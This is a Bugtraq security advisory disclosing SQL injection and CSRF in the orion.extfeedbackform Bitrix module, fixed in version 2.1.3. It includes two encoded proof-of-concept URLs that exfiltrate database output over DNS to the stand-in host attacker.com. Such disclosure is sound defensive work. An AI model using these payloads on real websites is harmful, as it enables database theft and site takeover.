[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SQL Injection in orion.extfeedbackform Bitrix Module
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SQL Injection in orion.extfeedbackform Bitrix Module
- From: High-Tech Bridge Security Research <advisory@xxxxxxxxxxx>
- Date: Wed, 16 Dec 2015 14:40:56 +0100 (CET)
Advisory ID: HTB23280
Product: orion.extfeedbackform Bitrix module
Vendor: www.orion-soft.ru
Vulnerable Version(s): 2.1.2 and probably prior
Tested Version: 2.1.2
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: December 11, 2015
Public Disclosure: December 16, 2015
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-8355
Risk Level: Medium
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two vulnerabilities in
orion.extfeedbackform Bitrix module, can be exploited to execute arbitrary SQL
queries and obtain potentially sensitive data, modify information in database
and gain complete control over the vulnerable website.
All discovered vulnerabilities require that the attacker is authorized against
the website and has access to vulnerable module. However the vulnerabilities
can be also exploited via CSRF, since the web application does not check origin
of received requests. This means, that a remote anonymous attacker can create a
page with CSRF exploit, trick victim to visit this page and execute arbitrary
SQL queries in database of vulnerable website.
The vulnerability exists due to insufficient filtration of input data passed
via the "order" and "by" HTTP GET parameters to
"/bitrix/admin/orion.extfeedbackform_efbf_forms.php" script. A remote
authenticated attacker can manipulate SQL queries by injecting arbitrary SQL
code.
Below are two exploits for each vulnerable parameter. They are based on DNS
Exfiltration technique and may be used if the database of the vulnerable
application is hosted on a Windows system. The PoC will send a DNS request
demanding IP address for `version()` (or any other sensitive output from the
database) subdomain of ".attacker.com" (a domain name, DNS server of which is
controlled by the attacker).
"order":
http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?by=ID,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,
%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,
CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,
CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29+--+
"by":
http://[host]/bitrix/admin/orion.extfeedbackform_efbf_forms.php?order=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,
%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,
CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,
CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,
CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,
CHAR%28114%29%29%29%29+--+
-----------------------------------------------------------------------------------------------
Solution:
Update to orion.extfeedbackform 2.1.3
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23280 -
https://www.htbridge.com/advisory/HTB23280 - SQL Injection in
orion.extfeedbackform Bitrix module
[2] orion.extfeedbackform -
https://marketplace.1c-bitrix.ru/solutions/orion.extfeedbackform/ - Bitrix
module for feedback forms.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.